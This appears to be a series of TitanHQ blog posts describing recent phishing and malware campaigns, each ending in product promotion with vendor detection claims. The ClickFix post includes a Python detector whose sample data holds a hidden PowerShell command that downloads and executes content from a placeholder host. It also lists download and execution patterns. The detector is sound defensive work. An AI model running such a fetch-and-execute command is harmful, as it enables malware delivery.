The attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity measure: if passwords are compromised, access to accounts can still be prevented. Unfortunately, multifactor authentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages offered to cybercriminals that cover all aspects of phishing. Once purchased, phishing campaigns can be conducted with minimal effort, as the phishing kit generates copies of websites that impersonate well-known brands, the infrastructure for capturing credentials, and templates for phishing emails. After paying a fee, all that is required is to supply the email addresses for the campaign, which can be easily purchased on hacking forums.
Some of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are then used to bypass MFA access controls during subsequent authentication. One of the latest phishing kits to be identified has been dubbed Sneaky 2FA. The kit was first identified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia. The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA phishing kit.
As with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing page. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient into opening a PDF file attachment containing a QR code that directs the user to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages have a blurred background and a login prompt, and Microsoft 365 credentials are required to access the blurred content. The phishing pages automatically add the user’s email address to the login prompt, so they are only required to enter their password. To evade detection, multiple measures are employed, such as traffic filtering, Cloudflare Turnstile challenges, and CAPTCHA checks.
Many phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles communications with the Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the authentication steps. When the password is entered, the user is directed to the next page, and the victim’s email address and password are sent to the phishing server via an HTTP POST. The server responds with the 2FA method configured for the victim’s account, and the victim’s response to that 2FA step is likewise sent to the phishing server. The phishing kit allows session cookies to be harvested that provide account access regardless of the 2FA method – Microsoft Authenticator, one-time password code, or SMS verification.
Phishing kits such as Sneaky 2FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective at defeating phishing-resistant MFA such as FIDO2, WebAuthn, or biometric authentication. The problem is that these forms of MFA can be expensive and difficult to deploy at scale.
Businesses can greatly improve their defenses with advanced spam filter software offering AI and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external sources. Effective email filtering will ensure that these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions – SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated first for protection in the Q4 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection rate.
Regular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.
For more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam, Security Awareness, Spam Software, Website Filtering
A new malware variant called PLAYFULGHOST has been discovered that is being distributed via phishing emails and via websites that appear high in search engine listings through black hat search engine optimization (SEO) tactics.
PLAYFULGHOST was analyzed by Google’s Mandiant Managed Defense team, which confirmed the malware has extensive information-stealing capabilities. They include keylogging, taking screenshots, recording audio, copying information from the clipboard, stealing QQ account information, and collecting information on the installed security solutions and system metadata. The malware can also block mouse and keyboard inputs, clear Windows event logs, delete caches and profiles from web browsers, and erase profiles and local storage for messaging apps; it also has file transfer capabilities and can download additional payloads. The malware achieves persistence in four ways: registry keys, scheduled tasks, establishing itself as a Windows service, and entries in the Windows Startup folder. In short, PLAYFULGHOST is a highly capable and very dangerous new malware variant.
An analysis of the distribution methods identified SEO poisoning, where websites are promoted so they appear high in the search engine listings for search terms related to Virtual Private Network solutions, including the legitimate LetsVPN solution. If a user visits the webpage, they can download the LetsVPN installer; however, it has been trojanized to silently load PLAYFULGHOST in memory via an interim payload. Phishing is also used to distribute the malware. While multiple lures could be used in this campaign, intercepted emails had code-of-conduct-related lures to trick the recipient into opening a malicious RAR archive containing a Windows executable file that downloads and executes the malware from a remote server.
Once a device is infected, detection can be problematic since the malware runs in memory, and the multiple persistence mechanisms make removal challenging. It is vital that infection is prevented, and that requires multiple measures since the malware is distributed in different ways. To protect against malware delivery via SEO poisoning and malvertising, businesses should use a web filter and provide regular security awareness training to the workforce. The WebTitan DNS filter is a web filtering solution that protects against web-delivered malware in a variety of ways. WebTitan is fed extensive up-to-the-minute threat intelligence on malicious websites and domains and will prevent users (on and off the network) from visiting those malicious websites. That includes visits to websites through web browsing and redirects through malvertising.
WebTitan can be configured to block certain downloads from the Internet by file extension, such as installers and other executable files. In addition to preventing malware delivery, this feature can be used to control shadow IT – software installations that have not been authorized by the IT department. WebTitan can also be used to control the web content that employees can access, by blocking access to web content that serves no work purpose along with risky categories of websites.
Security awareness training is vital for making employees aware of the risks of malware downloads from the Internet. Employees should be instructed not to download software from unofficial websites, warned of the risks of malvertising, and told not to trust a website simply because it is positioned high in the search engine listings. Employees should also be warned of the risk of phishing, be taught how to identify a phishing attempt, and be conditioned to report suspicious emails to their security team. A phishing simulator should also be used to reinforce training and identify individuals who are susceptible to phishing so they can be provided with additional training. TitanHQ’s SafeTitan security awareness training and phishing simulation platform makes this as easy as possible, automating the delivery of training and phishing simulation exercises.
TitanHQ offers two powerful anti-phishing solutions – PhishTitan for Microsoft 365 users and SpamTitan anti-spam software. Both are powered by the same advanced engine that was recently assessed by VirusBulletin, and confirmed to block 100% of malware, 100% of phishing emails, and 99.999% of spam emails in Q4 tests. The incredibly strong performance earned TitanHQ top spot out of all the leading solutions under test. The strong anti-malware performance was due to twin (signature-based) antivirus engines and cutting-edge behavioral protection with email sandboxing.
With new, stealthy malware variants constantly being released, and cybercriminals developing highly sophisticated AI-based phishing campaigns, businesses need to ensure they have cybersecurity solutions capable of identifying and blocking the threats. With TitanHQ as your cybersecurity partner, you will be well protected against ever-evolving cyber threats. Give the TitanHQ team a call today for further information on bolstering your malware and phishing defenses or put these solutions to the test in a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam
In the United States, tax returns for the previous year need to be filed before Tax Day, which falls on Tuesday, April 15, 2025. Tax season officially started on January 27, 2025, when the Internal Revenue Service (IRS) started accepting tax returns for 2024. Tax season is a popular time for cybercriminals who take advantage of individuals and businesses that are under pressure to file their annual tax returns and try to steal personal information to file fraudulent tax returns in victims’ names and for other nefarious purposes.
Cybercriminals use tried and tested methods for their scams, but over the past few years, the scams have become more sophisticated. There has been a significant increase in the use of AI tools to craft highly convincing phishing emails. Phishing is one of the most common ways that cybercriminals trick people into disclosing sensitive information during tax season. One of the most common phishing techniques in tax season involves impersonation of the IRS. Emails are sent that appear to have come from an official IRS domain, the contact information in the email may be 100% correct, and the emails contain the IRS logo. The lures used in these scams include fake offers of tax refunds with rapid payment, legal threats, and criminal charges for tax fraud. These scams tempt or scare people into visiting a website linked in the email or calling a telephone number provided in the email.
The website to which the user is directed mimics the official IRS site, and social engineering techniques are used to get the user to disclose sensitive information. That information is rapidly used to file a fraudulent tax return, with the victim only discovering they have been scammed when they file their own tax return and are notified by the IRS that it is a duplicate. Alternatively, victims are told that they must pay outstanding tax immediately and are threatened with fines and criminal charges if they fail to do so. Scams promising a tax refund require personal information and bank account details to be disclosed.
Businesses are targeted in a variety of tax season scams, with one of the most common being fake tax services. Filing tax returns can be a time-consuming and arduous process, so tax filing services that do all of the work are an attractive choice. Businesses may be contacted via email, telephone, or could be directed to these scam services via the Internet. Businesses are tricked into providing personal and financial information, which could be used to file a fraudulent tax return. Commonly, the aim is to trick the business into downloading malware onto their device. These services may lure victims by promising quick tax refunds, which can be attractive for cash-strapped businesses.
According to the IRS, last year taxpayers lost $5.5 billion to tax scams and fraud so vigilance is key during tax season. Be aware that cybercriminals are incredibly active during tax season, and any offer that seems too good to be true most likely is. The IRS will not initiate contact via email or text message, as initial contact is typically made via the U.S. Postal Service, and emails and text messages are only sent if the IRS has been given permission to do so. The IRS will not make contact via social media, does not accept gift cards as payment, does not use robocalls, and does not threaten to call law enforcement or immigration officials.
Businesses should ensure they have anti-spam software to catch and neutralize phishing threats; however, not all spam filtering services are equal. Spam filters perform a range of checks on inbound email: reputation checks of the sender’s domain and email address, anti-spoofing checks, lookups against blacklists of malicious IP addresses, assessment of the email content for malicious links and common signatures of phishing, and anti-virus scanning of attachments. While these methods will identify the vast majority of spam emails and many phishing attempts, these checks alone are no longer sufficient.
The best spam filter for business is an advanced solution that has AI and machine learning capabilities for detecting advanced phishing scams and AI-generated threats. To catch and block AI-generated threats you need AI in your defenses. SpamTitan is an advanced cloud-based anti-spam service from TitanHQ (an anti-spam gateway is also available) that performs all of the standard checks mentioned above, scans emails with twin anti-virus engines, and uses machine-learning-based detection to identify the threats that many other spam filtering software solutions miss. If initial checks are passed, emails are sent to an email sandbox for deep analysis. With email sandboxing, attachments are assessed in a safe environment and their behavior is analyzed in depth, allowing novel malware to be identified and links are followed and assessed for malicious content.
SpamTitan consistently outperforms other leading email security solutions and, in the latest round of independent tests at VirusBulletin, SpamTitan was ranked in first place due to unbeatable detection rates, having blocked 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. This tax season, ensure you have the best email protection for your business by using SpamTitan. Call TitanHQ for more information, to arrange a product demonstration, or sign up for a free trial to see for yourself how effective SpamTitan is at blocking email threats.
by titanadmin | Jan 26, 2025 | Phishing & Email Spam
Cybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high percentage chance that the emails will land in the inbox of someone that uses the products of those companies.
In the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.
Phishing campaigns that combine multiple communication methods are becoming more common, such as callback phishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end. The user is informed that they must call the number in the email to terminate the subscription before the charge is applied. If the number is called, the threat actor uses social engineering techniques to trick the user into downloading a remote access solution to remove the software and prevent the charge. The software gives the threat actor full control of their device.
The latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.
One user received a call in which a caller claiming to be a Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate. The call was supposedly to verify the validity of the family member’s claim. People targeted in this campaign may attempt to verify the call by checking the phone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google customer support number.
The second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.
Performing such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.
Businesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.
An advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud-based anti-spam software incorporates machine learning capable of identifying previously unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.
by titanadmin | Jan 26, 2025 | Internet Security, Phishing & Email Spam, Spam Software
Cybercriminals are increasingly using a social engineering technique dubbed ClickFix to gain persistent access to victims’ networks by tricking the victim into installing malware. ClickFix attacks were first identified in early 2024, and the use of this tactic has been increasing. These attacks take advantage of users’ desire to quickly resolve IT issues without having to inform their IT department. Resolving issues can take time, and usually involves raising a support ticket with the IT department. In ClickFix attacks, the threat actor warns the user about a fake IT issue, often providing some evidence of that issue, and offers a quick and easy solution.
The aim of these attacks is to trick the user into running a PowerShell command, which ultimately delivers malware to their device. Campaigns have been conducted by threat actors distributing the Lumma information stealer, the Danabot banking trojan/information stealer, the AsyncRAT remote access trojan, and the DarkGate loader, although any number of malware variants could be delivered using this technique. Multiple threat groups have been observed using this technique.
The methods used to get the user to run the malicious PowerShell command are varied, with the deception occurring via email, the Internet, or a combination of the two. Threat actors have been observed conducting phishing ClickFix attacks involving emails with HTML attachments disguised as Microsoft Word documents. The attachments display a fake error message, the resolution of which requires copying and executing a malicious PowerShell command.
Malicious links have been distributed in phishing emails that direct users to sites impersonating software solutions such as Google Meet and PDFSimpli, the Chrome web browser, social media platforms such as Facebook, and transport and logistics companies. Threat actors also use stolen credentials to compromise websites and add pop-ups that appear when visitors land on the site, warning them about a fictitious security issue. Fake CAPTCHA prompts are often used, where the user is told they must verify that they are human before being allowed to proceed. As part of the verification process, a command is copied to the clipboard, and the user is told to press the Windows key + R, then CTRL + V, and then Enter, thus executing the script and triggering a malware download. Security researchers have identified multiple threat actors using this technique, including Russian espionage actors in targeted attacks on Ukrainian companies and many different financially motivated cybercriminal groups.
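The Run-dialog step described above leaves a distinctive trace in endpoint telemetry: an interpreter such as powershell.exe started with explorer.exe as its parent and a command line built to hide its window and fetch and execute content from a URL. The scorer below is an added example written for this article, not TitanHQ code and not a feature of any product named here. It assumes Sysmon-style process-creation records with `Image`, `ParentImage`, `CommandLine` and `User` fields; the events it runs over are constructed for the demonstration, including an administrator's scheduled backup script that must not be flagged.

```python
"""Score process-creation events for ClickFix-style interpreter launches.

Added example (not TitanHQ code). Events are constructed dicts shaped like
Sysmon Event ID 1 records; a real deployment would feed EDR telemetry with
the same field names.
"""
import re

# Interpreters the Run dialog is abused to start in ClickFix attacks.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (pattern, weight, label). Weights are summed and compared to THRESHOLD so
# that a single weak indicator (e.g. a URL) never fires on its own.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I), 2, "encoded command"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl)\b", re.I), 2, "web download"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2, "in-memory execution"),
    (re.compile(r"https?://", re.I), 1, "URL in command line"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), 1, "profile bypass"),
]
THRESHOLD = 3


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    # Run dialog (Win+R) launches have explorer.exe as the parent process,
    # unlike scripts started by a scheduler, a service, or an admin console.
    if parent == "explorer.exe":
        score += 1
        reasons.append("launched from explorer.exe (Run dialog)")
    for pattern, weight, label in INDICATORS:
        if pattern.search(event["CommandLine"]):
            score += weight
            reasons.append(label)
    return score, reasons


def detect_clickfix(events) -> list[dict]:
    """Return the events whose score reaches THRESHOLD, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= THRESHOLD:
            hits.append({"User": ev["User"], "CommandLine": ev["CommandLine"],
                         "Score": score, "Reasons": reasons})
    return hits


# Constructed telemetry: three benign launches and one ClickFix-style paste.
SAMPLE_EVENTS = [
    {"User": r"CORP\svc_backup", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"User": r"CORP\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"User": r"CORP\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
    {"User": r"CORP\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -c "iex (iwr https://cdn.example.invalid/verify -UseBasicParsing)"'},
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit["User"], hit["Score"], ", ".join(hit["Reasons"]))
```

The weighting matters: an analyst opening PowerShell from the Start menu scores 1, and the scheduled backup scores 0 because nothing in its command line downloads or decodes anything, while the pasted one-liner accumulates every indicator at once. For after-the-fact triage on a single machine, the Run dialog also records what was typed or pasted into it under the user's `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` registry key, so a PowerShell entry there corroborates a hit from this telemetry.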
To defend against ClickFix attacks, businesses need layered mitigations, the most important of which are security awareness training, an advanced spam filter, and a web filtering solution. Regular security awareness training should improve understanding of the phishing and social engineering techniques used by threat actors, including specific content on how to identify and avoid ClickFix lures: no legitimate CAPTCHA or error message ever asks a user to paste a command into the Run dialog. Where standard users have no need for the Run dialog or PowerShell, restricting both through Group Policy removes the execution path altogether, and logging process command lines makes any pasted command visible to the security team. TitanHQ offers a comprehensive training platform called SafeTitan that allows businesses to easily create security awareness training programs tailored to individuals and user groups, and rapidly roll out additional training material when a new threat is identified. SafeTitan also includes a phishing simulator to test employee responses to simulated ClickFix attacks.
An advanced spam filter is essential for blocking malicious emails. TitanHQ’s SpamTitan suite of solutions includes a spam filter for Office 365, a gateway spam filter, and the most popular choice, a cloud-based anti-spam service. SpamTitan conducts an extensive array of tests to identify spam and malicious emails, including reputation checks, checks of embedded hyperlinks, email sandbox behavioral analysis, and AI/machine learning to identify the threats that bypass many email security solutions. In recent tests, SpamTitan outperformed all other tested email security solutions with a 100% malware and phishing catch rate and a 99.999% spam catch rate.
Web filtering solutions should be used to protect against the web-based component of ClickFix attacks, since initial contact is not always made via email. The WebTitan DNS filter prevents access to known malicious websites, such as the attacker-controlled webpages used in ClickFix attacks. WebTitan can also block downloads of specified file extensions and control the categories of websites that employees can visit.
With regular security awareness training, email security, and web security delivered through SafeTitan, SpamTitan, and WebTitan, businesses will be well protected from ClickFix attacks. Call TitanHQ today to find out more or take advantage of a free trial of these solutions.
by titanadmin | Jan 25, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
A new AI chatbot has been released specifically for use by cybercriminals, developed to assist with malware development, phishing campaigns, and business email compromise attacks. The chatbot is called GhostGPT and follows the release of WormGPT, WolfGPT, and EscapeGPT, which are also aimed at cybercriminals and lack the restrictions of ChatGPT and other publicly available chatbots that refuse to answer queries related to criminality. GhostGPT is thought to connect to a jailbroken open-source large language model (LLM), ensuring queries are not subject to content restrictions. The tool is sold via Telegram, and for a fee it can be used immediately.
There is growing evidence that cybercriminals are using AI tools for malware development, phishing/spear phishing, and business email compromise and there is considerable interest in these tools in the cybercriminal community. These tools can open up new types of attacks to low-skilled cybercriminals, as well as help skilled cybercriminals conduct attacks at an accelerated rate and bypass security solutions. These tools can be used to write malware code with extensive capabilities, dramatically reducing the time required for malware development. Phishing emails can be crafted in multiple languages with perfect grammar and spelling. AI tools are being used to slash the time taken to research individuals for spear phishing and BEC attacks and can even generate emails likely to be of interest to recipients. A recent study demonstrated that humans are not good at identifying AI-generated phishing emails. The researchers found their AI-generated emails had a 54% click rate.
These tools allow rapid development of malware from scratch and cybercriminals can easily spin up multiple malware versions capable of defeating signature-based detection. Phishing and BEC emails can easily fool targeted individuals as they lack the common signs of malicious emails that employees are taught to look for and the level of personalization of emails can be increased with little effort, making it easy for cybercriminals to scale up their spear phishing and BEC campaigns.
Malicious use of LLMs is a genuine cause for concern. Businesses need to respond to these fast-evolving threats by improving their cybersecurity defenses. Since these attacks are predominantly conducted via email, robust email defenses are a must. To defeat AI-generated phishing emails, businesses need to ensure they incorporate AI in their defenses and email security solutions need more than signature-based detection to identify and block malware.
SpamTitan, TitanHQ’s spam filtering service, incorporates AI and machine learning algorithms to identify the malicious AI-generated emails that many spam filtering solutions fail to block. SpamTitan also includes a next-generation email sandbox, where emails are sent for extensive analysis to identify threats from their behavior rather than their signature. In the Q4 2024 VirusBulletin tests, the engine that powers SpamTitan and TitanHQ’s Microsoft 365 anti-phishing solution, PhishTitan, ranked first for overall score, outperforming all other leading email filtering solutions under test. TitanHQ achieved a 100% malware catch rate, 100% phishing catch rate, and 99.999% spam catch rate, with a 0.000% false positive rate.
The high percentage of individuals fooled by AI-generated phishing emails highlights the importance of conducting regular security awareness training. Employees must be kept aware of the latest threats and tactics used by cybercriminals, and training should be reinforced with phishing simulations. Phishing simulations have been proven to make training more effective and highlight the individuals who are failing to apply their training to the emails they receive on a daily basis. The SafeTitan security awareness training platform and phishing simulator make it easy to spin up training courses, keep employees up to date on the current threat landscape, and automate phishing simulations.
Speak with the TitanHQ team today to discuss your options for improving your defenses against phishing and malware. TitanHQ’s solutions are available on a free trial, and product demonstrations can be arranged on request.
by titanadmin | Jan 20, 2025 | Phishing & Email Spam
New phishing schemes are constantly developed by threat actors to trick people into disclosing sensitive information or downloading malicious files that provide the attacker with remote access to their devices. This month, two campaigns have been identified that use PDF files to hide the phishing content from email security solutions, one of which uses a lure of expired Amazon Prime memberships, and the other impersonates the US Postal Service and advises the recipient about a failed delivery.
Amazon Prime Phishing Campaign
The emails in this phishing campaign appear to have been sent by Amazon Prime and include a PDF file attachment. The PDF file advises the recipient that their membership is due to expire on a specified date; however, the card Amazon has on file is no longer valid. In order to continue with the membership, new card details must be supplied; however, attempts will first be made to charge the membership to all other cards on the account. Users are warned that if payment is not made, the account will be suspended.
Due to the huge number of Amazon Prime members, the emails have a good chance of landing in the inbox of an Amazon Prime subscriber; however, anyone who has previously had an Amazon Prime membership may be tricked into following the link in the PDF to ensure that the cards on file will not be charged.
If the link is clicked, the user is directed to a URL on a duckdns.org subdomain that displays an exact copy of the Amazon sign-in page. DuckDNS is a free dynamic DNS service, so the hostname is attacker-registered and has no connection to Amazon, which is the detail a careful look at the address bar reveals. If they attempt to log in, they are asked to secure their account by confirming their identity and are told to sign out of all web apps, devices, and web browsers. The “Verify Your Identity” page asks for their full name, date of birth, Social Security number, phone number, and full address. They are then taken to a page where they are asked to enter their payment card information. In addition to fraudulent charges to their card, the theft of personal information puts victims at risk of identity theft.
US Postal Service Phishing Campaign
A large-scale phishing campaign is being conducted impersonating the US Postal Service that similarly uses malicious PDFs. This campaign specifically targets mobile devices with the aim of harvesting personal information. More than 630 phishing pages have been identified as part of this campaign targeting individuals in more than 50 countries. The PDF files use a novel technique for hiding the phishing URL from email security solutions, making it harder to identify and extract the URL for analysis.
Text messages are sent that advise the recipient that a package has arrived at a USPS distribution center; however, the package cannot be delivered due to incomplete address information. A link is included to a web-hosted PDF file that the recipient is told they must click to complete the address information. The link directs the user to a phishing page, where they must enter their full address, email address, and contact telephone number into the form. They are then asked to pay a small service charge for redelivery – $0.30 – and must submit their card details.
Improve Your Phishing Defenses
These are just two examples of new phishing campaigns that use PDF files to hide phishing links from email security solutions. PDF files are commonly used for this purpose as they can contain clickable links, scripts, and even malicious payloads. What makes the attacks even more effective is when they target mobile devices, which have smaller screens that make it harder to view the URL, thus making it easier to hide a domain unrelated to the company being impersonated. Mobile devices also tend to have weaker security than desktop computers and laptops.
Businesses should ensure they conduct regular security awareness training to teach cybersecurity best practices, warn employees about cyber threats, and teach the skills needed to identify phishing and social engineering attempts. Training should be an ongoing process and should include the latest scams and new techniques used by cybercriminals to target employees, especially campaigns targeting mobile devices as malicious text messages are harder to block than malicious emails. An advanced email security solution should be implemented that has AI and machine learning capabilities, and email sandboxing to analyze emails and attachments in-depth to identify malware, malicious scripts, and embedded hyperlinks.
TitanHQ can help in both of these areas. SafeTitan is a comprehensive security awareness training platform that makes it easy to create and automate security awareness training for the workforce. The platform includes a phishing simulator for conducting internal phishing campaigns to reinforce training and identify individuals who are susceptible to phishing attempts.
TitanHQ’s cloud-based anti-spam service, SpamTitan, is an advanced email security solution for blocking the full range of email threats, including phishing, spear phishing, business email compromise, and malware. In independent tests, SpamTitan achieved first place for detection, blocking 100% of phishing attempts, 100% of malware, and 99.999% of spam emails, with a 0.000% false positive rate.
For more information on cloud-based email filtering and attachment and message sandboxing with SpamTitan and security awareness training and phishing simulations with SafeTitan, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial, and MSP-focused solutions are available to easily add advanced anti-phishing and security awareness training to service stacks.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam
Large language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the China-developed DeepSeek app.
These AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, job applications, and completing homework, translating from one language to another, creating summaries of text to pull out the key points, and writing and debugging code to name just a few applications.
When these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spearphishing, and social engineering.
Guardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by cybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.
Evidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify but AI-generated phishing emails lack these easily identified red flags.
While cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving the intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.
A recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve click rates.
For the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.
The bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the cost of the AI automation tools.
What made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective strategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to obtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted individual was massively reduced. In the researchers’ campaign, the web was scraped for personal information and the targeted individuals were invited to participate in a project that aligned with their interests. They were then provided with a link to click for further information. In a genuine malicious campaign, the linked site would be used to deliver malware or capture credentials.
AI-generated phishing is a major cause for concern, but there is good news. AI tools can be used for malicious purposes, but they can also be used defensively and can identify the phishing content that humans struggle to spot. Security professionals should be concerned about AI-generated phishing, but email security solutions such as SpamTitan can give them peace of mind.
SpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify human-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware threats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a phishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When combined with TitanHQ’s security awareness training platform and phishing simulator – SafeTitan, security teams will be able to sleep easily.
For more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and managed service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam, Security Awareness
A scam has recently been identified that impersonates the CrowdStrike recruitment process and tricks recipients into downloading the XMRig cryptocurrency miner. Initial contact is made via email, with the email using CrowdStrike branding and offering an interview with the company.
The emails claim that the next phase of the hiring process is a 15-minute call with the hiring team, but that this year the company is rolling out a new applicant and employee CRM app. The recipient is instructed to click the employee CRM application button, which downloads a fake application for scheduling the interview. Windows and macOS versions are offered, but the downloaded file is an XMRig installer. When executed, it checks whether a debugger is attached to the process, whether the device has at least two CPU cores and is therefore worth mining on, and whether virtualization or sandbox-related processes are present, so that it does not run in an analysis environment. If the checks pass, a copy of XMRig is downloaded from GitHub and executed. The user is then shown an error message claiming the installation failed, possibly due to a hardware compatibility issue, and is told to try again by downloading the application on another device, potentially infecting a second machine with XMRig.
Jobseekers are often targeted in phishing scams. In the hunt for a job, they can be susceptible to phishing attempts, forgetting their security awareness training in the hope of landing an exciting new position. Fraudsters often claim to be recruitment agents who have identified individuals for a lucrative job and may even claim that the job is theirs based on information found on professional networking sites or from headhunting activities. According to the Better Business Bureau, recruitment scams result in losses of around $2 billion each year, and these scams are becoming more common.
